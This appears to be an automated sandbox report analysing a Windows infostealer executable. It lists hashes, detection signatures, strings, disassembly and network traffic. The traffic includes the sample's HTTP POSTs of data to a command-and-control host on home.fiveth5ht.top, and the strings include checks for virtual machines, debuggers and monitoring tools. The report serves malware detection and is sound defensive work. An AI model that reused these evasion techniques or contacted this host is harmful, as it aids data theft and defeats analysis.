Windows Analysis Report
dZsdMl5Pwl.exe

Overview

General Information

Sample name: dZsdMl5Pwl.exe (renamed because original name is a hash value)
Original sample name: efd7bbaba8aa8e6865430d1ffcfbf2d5.exe
Analysis ID: 1581393
MD5: efd7bbaba8aa8e6865430d1ffcfbf2d5
SHA1: a9c1b894dc0628909524f21c2b8da3d80d4d1725
SHA256: 044837966b88050aafba12d5765a42768de8b1b55cd83a274df9a0fcf17fede2
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • dZsdMl5Pwl.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\dZsdMl5Pwl.exe" MD5: EFD7BBABA8AA8E6865430D1FFCFBF2D5)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: dZsdMl5Pwl.exeAvira: detected
Source: dZsdMl5Pwl.exeReversingLabs: Detection: 52%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: dZsdMl5Pwl.exeJoe Sandbox ML: detected
Source: dZsdMl5Pwl.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_009EA5B0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_009EB560
Source: dZsdMl5Pwl.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_0098255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0098255D
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_009829FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 561895
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox ViewIP Address: 5.101.3.217 5.101.3.217
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A4A8C0 recvfrom,0_2_00A4A8C0
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 561895
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 13:54:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 13:54:22 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: dZsdMl5Pwl.exe, 00000000.00000003.2466035923.0000000001BAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: dZsdMl5Pwl.exe, 00000000.00000002.2480706350.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: dZsdMl5Pwl.exe, 00000000.00000002.2480706350.0000000001B1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4
Source: dZsdMl5Pwl.exe, 00000000.00000002.2480706350.0000000001B1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963
Source: dZsdMl5Pwl.exe, 00000000.00000002.2480814044.0000000001B53000.00000004.00000020.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000003.2465756327.0000000001B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: dZsdMl5Pwl.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: dZsdMl5Pwl.exe, dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443

System Summary

Source: dZsdMl5Pwl.exeStatic PE information: section name:
Source: dZsdMl5Pwl.exeStatic PE information: section name: .idata
Source: dZsdMl5Pwl.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009905B00_2_009905B0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00996FA00_2_00996FA0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A4B1800_2_00A4B180
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009BF1000_2_009BF100
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A500E00_2_00A500E0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00D0E0500_2_00D0E050
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00D0A0000_2_00D0A000
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009E62100_2_009E6210
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A4C3200_2_00A4C320
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A504200_2_00A50420
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CD44100_2_00CD4410
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_0098E6200_2_0098E620
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00D047800_2_00D04780
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009EA7F00_2_009EA7F0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A4C7700_2_00A4C770
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CE67300_2_00CE6730
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A3C9000_2_00A3C900
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009949400_2_00994940
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_0098A9600_2_0098A960
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00C3AAC00_2_00C3AAC0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00B56AC00_2_00B56AC0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_0098CBB00_2_0098CBB0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CF8BF00_2_00CF8BF0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00B14B600_2_00B14B60
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00C3AB2C0_2_00C3AB2C
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00D0CC900_2_00D0CC90
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CFCD800_2_00CFCD80
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00D04D400_2_00D04D40
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00C9AE300_2_00C9AE30
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A4EF900_2_00A4EF90
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A48F900_2_00A48F90
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CD2F900_2_00CD2F90
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009A4F700_2_009A4F70
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009910E60_2_009910E6
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CED4300_2_00CED430
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CF35B00_2_00CF35B0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CD56D00_2_00CD56D0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00D117A00_2_00D117A0
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00A398800_2_00A39880
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00CD99200_2_00CD9920
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 0099CCD0 appears 53 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 0098CAA0 appears 62 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009871E0 appears 43 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 0099CD40 appears 68 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009C50A0 appears 86 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 00A644A0 appears 59 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 00B5CBC0 appears 93 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009C5340 appears 41 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009C4F40 appears 295 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009C4FD0 appears 220 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009875A0 appears 600 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 00B37220 appears 86 times
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: String function: 009873F0 appears 102 times
Source: dZsdMl5Pwl.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: dZsdMl5Pwl.exeStatic PE information: Section: sqttxtfh ZLIB complexity 0.9945883961905421
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_0098255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0098255D
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_009829FF
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: dZsdMl5Pwl.exeReversingLabs: Detection: 52%
Source: dZsdMl5Pwl.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: dZsdMl5Pwl.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: winmm.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: cryptsp.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: rsaenh.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: napinsp.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: wshbth.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: nlaapi.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: kernel.appcore.dll
Source: dZsdMl5Pwl.exeStatic file information: File size 4523520 > 1048576
Source: dZsdMl5Pwl.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: dZsdMl5Pwl.exeStatic PE information: Raw size of sqttxtfh is bigger than: 0x100000 < 0x1c4000

Data Obfuscation

Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeUnpacked PE file: 0.2.dZsdMl5Pwl.exe.980000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sqttxtfh:EW;byszctih:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sqttxtfh:EW;byszctih:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: dZsdMl5Pwl.exeStatic PE information: real checksum: 0x45f5d8 should be: 0x45aaa0
Source: dZsdMl5Pwl.exeStatic PE information: section name:
Source: dZsdMl5Pwl.exeStatic PE information: section name: .idata
Source: dZsdMl5Pwl.exeStatic PE information: section name:
Source: dZsdMl5Pwl.exeStatic PE information: section name: sqttxtfh
Source: dZsdMl5Pwl.exeStatic PE information: section name: byszctih
Source: dZsdMl5Pwl.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB36AB push eax; retf 0_3_01BB36B9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB349B push ds; retf 0_3_01BB34C9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB369B push edx; retf 0_3_01BB36A9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB368B push esp; retf 0_3_01BB3699
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB3488 push ss; retf 0_3_01BB3489
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB33FA push es; retf 0_3_01BB3409
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB30D8 pushfd ; retf 0_3_01BB30D9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB343D push cs; retf 0_3_01BB3449
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB371A pushad ; retf 0_3_01BB3739
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BABD10 push eax; ret 0_3_01BABD11
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB367B push esi; retf 0_3_01BB3689
Source: dZsdMl5Pwl.exeStatic PE information: section name: sqttxtfh entropy: 7.955283388143556

Boot Survival

Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: FilemonClass
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: RegmonClass
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: Regmonclass
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PROCMON.EXE
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: X64DBG.EXE
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WINDBG.EXE
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1221ABC second address: 1221AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1220CCA second address: 1220CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1221AC2 second address: 1221B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D17D7h] 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 cmc 0x00000013 mov dx, 0DC8h 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F49E47F2148h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov bx, 7D70h 0x00000038 jmp 00007F49E47F2150h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F49E47F2151h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1222BA4 second address: 1222BAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1221C92 second address: 1221C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11D78C8 second address: 11D78CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122542E second address: 1225432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12263FA second address: 12263FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1228457 second address: 1228465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F214Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12265B6 second address: 12265BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122930C second address: 1229347 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F49E47F2148h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 cmc 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d jng 00007F49E47F2150h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122C3AB second address: 122C3D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d jnp 00007F49E4E2C436h 0x00000013 pop edi 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
